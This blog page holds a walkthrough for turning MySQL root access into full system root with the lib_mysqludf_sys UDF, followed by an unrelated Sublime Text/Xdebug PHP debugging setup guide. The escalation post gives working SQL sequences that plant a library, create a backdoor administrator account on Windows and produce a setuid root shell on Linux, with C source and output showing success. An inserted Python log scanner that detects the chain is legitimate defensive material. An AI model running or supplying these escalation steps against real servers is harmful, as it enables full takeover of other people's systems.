Tuesday, November 18, 2014

MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux

Once a MySQL database server has been compromised at root level, it’s often possible to escalate this access to full system level access using User Defined Functions (UDFs). We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.
Firstly, you’ll want to check out a copy of sqlmap. For this attack you’ll want to browse to the ‘udf’ directory and select the appropriate library depending on your target platform:
  1. udf/mysql/linux/32/lib_mysqludf_sys.so
  2. udf/mysql/linux/64/lib_mysqludf_sys.so
  3. udf/mysql/windows/32/lib_mysqludf_sys.dll
  4. udf/mysql/windows/64/lib_mysqludf_sys.dll
The steps for escalation on both Windows and Linux are the same. First, we need to get a copy of the correct library onto the target machine in a known location – this could be by uploading to a user account we have access to, via a website image/file upload, or via an anonymous FTP account. The second step is issuing a SQL query to load this file into a newly created table row.
Third, we dump that table row out to a new file in either the ‘/usr/lib’ directory or the ‘c:\windows\system32’ directory, depending on whether we are on Linux or Windows respectively. The reason we need to do this is that our regular web application or user account does not have permission to create files in these directories, but the MySQL root user does. Next, we instruct MySQL to create a new function that points to the code in our malicious library. Lastly, we execute this new function with whatever system commands we wish to run.

MySQL on Windows Escalation
On Windows, the process is as follows:
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");



MySQL on Linux Escalation
On Linux, the process is really much the same, assuming we’re logged in as user ‘npn’:

* mysql> use mysql;
* mysql> create table npn(line blob);
* mysql> insert into npn values(load_file('/home/npn/lib_mysqludf_sys.so'));
* mysql> select * from npn into dumpfile '/usr/lib/lib_mysqludf_sys.so';
* mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
* mysql> select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');
Now from our shell, we can cat /tmp/out:

* npn@pwn:~$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
We can confirm that the commands we ran were executed as root. The easiest thing to do now is for user ‘npn’ to create and compile a simple setuid/system program in C:

#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
    /* only takes effect once the binary carries the setuid bit (set below via MySQL) */
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
We can compile this and place it in /tmp/ with:

gcc -o /tmp/shell /home/npn/shell.c
Finally, we can use our MySQL root account to set the setuid bit on the binary:

* mysql> select sys_exec('chmod +s /tmp/shell');
User ‘npn’ can then execute /tmp/shell to gain a root shell:

npn@pwn:~$ /tmp/shell
root@pwn:/home/npn# cd ~/
root@pwn:~# id
uid=0(root) gid=0(root) groups=0(root)
root@pwn:~# ps
  PID TTY          TIME CMD
 1919 pts/1    00:00:00 bash
 2058 pts/1    00:00:00 ps
root@pwn:~#
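From the defender's side, the whole chain above leaves a very recognisable footprint in MySQL's general query log: a load_file() read, an INTO DUMPFILE write, a CREATE FUNCTION ... SONAME, and then a call to the function that was just registered, all on one connection. The following Python is an added example (not from the original post) that scans constructed general-log lines in the MySQL 5.x tab-separated format (timestamp, thread id, command, argument) for that sequence; the log lines are made up to mirror the Linux session above.

```python
import re
from collections import defaultdict

# Constructed sample of MySQL general-query-log lines (tab separated:
# timestamp, thread id, command type, argument), mirroring the chain above.
SAMPLE_LOG = """\
141118 10:02:11\t   7 Query\tuse mysql
141118 10:02:12\t   7 Query\tcreate table npn(line blob)
141118 10:02:13\t   7 Query\tinsert into npn values(load_file('/home/npn/lib_mysqludf_sys.so'))
141118 10:02:14\t   7 Query\tselect * from npn into dumpfile '/usr/lib/lib_mysqludf_sys.so'
141118 10:02:15\t   7 Query\tcreate function sys_exec returns integer soname 'lib_mysqludf_sys.so'
141118 10:02:16\t   7 Query\tselect sys_exec('id > /tmp/out')
141118 10:02:20\t   9 Query\tselect name, email from customers where id = 42
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+)\t\s*(?P<thread>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")
STAGES = [
    ("read_library",  re.compile(r"\bload_file\s*\(", re.I)),
    ("write_library", re.compile(r"\binto\s+dumpfile\b", re.I)),
    ("register_udf",  re.compile(r"\bcreate\s+function\s+(?P<fn>\w+).*\bsoname\b", re.I)),
]

def scan_general_log(text):
    """Return (thread_id, stage, query) hits. A connection that completes all
    three stages and then calls the UDF it registered gets a 'udf_escalation' hit."""
    hits, seen, udf_names = [], defaultdict(set), defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["cmd"] != "Query":
            continue
        tid, q = m["thread"], m["arg"]
        for stage, rx in STAGES:
            sm = rx.search(q)
            if sm:
                hits.append((tid, stage, q))
                seen[tid].add(stage)
                if stage == "register_udf":
                    udf_names[tid].add(sm["fn"].lower())
        # a call to a function this same connection registered via SONAME
        for fn in udf_names[tid]:
            if re.search(r"\b%s\s*\(" % re.escape(fn), q, re.I) and not q.lstrip().lower().startswith("create"):
                hits.append((tid, "call_udf", q))
                seen[tid].add("call_udf")
    for tid, stages in seen.items():
        if {"read_library", "write_library", "register_udf", "call_udf"} <= stages:
            hits.append((tid, "udf_escalation", "full chain observed on thread %s" % tid))
    return hits
```

The step the detector keys on hardest, the DUMPFILE write into a library directory, is also the one that a restrictive secure_file_priv and a plugin_dir not writable by the mysql OS user remove outright.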

Setup PHP Debugger with Sublime in Kali(Debian)


1. Install Sublime
# wget "http://c758482.r82.cf2.rackcdn.com/sublime-text_build-3065_amd64.deb"
# dpkg -i sublime-text_build-3065_amd64.deb

2. Run sublime
# cd /opt/sublime_text
# ./sublime_text

3. Install package control plugin. Open View -> Show Console
If you use Sublime Text 2:
"import urllib2,os,hashlib; h = '7183a2d3e96f11eeadd761d777e62404' + 'e330c659d4bb41d3bdf022e94cab3cd0'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); os.makedirs( ipp ) if not os.path.exists(ipp) else None; urllib2.install_opener( urllib2.build_opener( urllib2.ProxyHandler()) ); by = urllib2.urlopen( 'http://packagecontrol.io/' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); open( os.path.join( ipp, pf), 'wb' ).write(by) if dh == h else None; print('Error validating download (got %s instead of %s), please try manual install' % (dh, h) if dh != h else 'Please restart Sublime Text to finish installation')"

If you use Sublime Text 3 (the version used in this post):
Paste this code and press Enter
"import urllib.request,os,hashlib; h = '7183a2d3e96f11eeadd761d777e62404' + 'e330c659d4bb41d3bdf022e94cab3cd0'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); urllib.request.install_opener( urllib.request.build_opener( urllib.request.ProxyHandler()) ); by = urllib.request.urlopen( 'http://packagecontrol.io/' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); print('Error validating download (got %s instead of %s), please try manual install' % (dh, h)) if dh != h else open(os.path.join( ipp, pf), 'wb' ).write(by) "

4. Restart Sublime

5. Go to Preference -> Package Control to Install Package(Plugin)

6. Type xdebug and install it

7. Install LAMP(Linux + Apache2 + MySQL + PHP) and requirement software
#  apt-get install apache2 php5 php5-gd mysql-server php5-mysql php5-dev php-pear make python

8. Install Xdebug module for PHP5
# apt-get install php5-xdebug

Configure the xdebug module in /etc/php5/conf.d/20-xdebug.ini with these options:
zend_extension=/usr/lib/php5/20100525/xdebug.so
xdebug.remote_enable=on
xdebug.remote_handler=dbgp
xdebug.remote_host=localhost
xdebug.remote_port=9000


9. Restart Apache2
# /etc/init.d/apache2 restart

9. Create an example loop PHP file in Sublime
<?php
    $arr = array(1, 2, 3, 4);

    foreach ($arr as &$value)
    {
        $value = $value * 2;

        print $value;
    }
?>


10. In Sublime, create some breakpoints with right click and Xdebug -> Add/Remove Breakpoint.

11. In Sublime menu, Go to "Tools -> Xdebug -> Start Debugging"
(You can see the config of Sublime from "Tools -> Xdebug -> Settings Default(Or Settings User)")

12. Open Firefox

13. Install "The easiest Xdebug 2.0" addon

14. Restart Firefox

15. Go to "Tools -> Addons", open the preferences of The easiest Xdebug 2.0

16. Input "sublime.xdebug" into IDE key for remote debugging.

17. Visit the page that we want to debug (the same page as step 9). Click the bug icon on the right side


18. Refresh the page in the web browser; debugging begins and Sublime takes control of the output page, stopping at the breakpoints.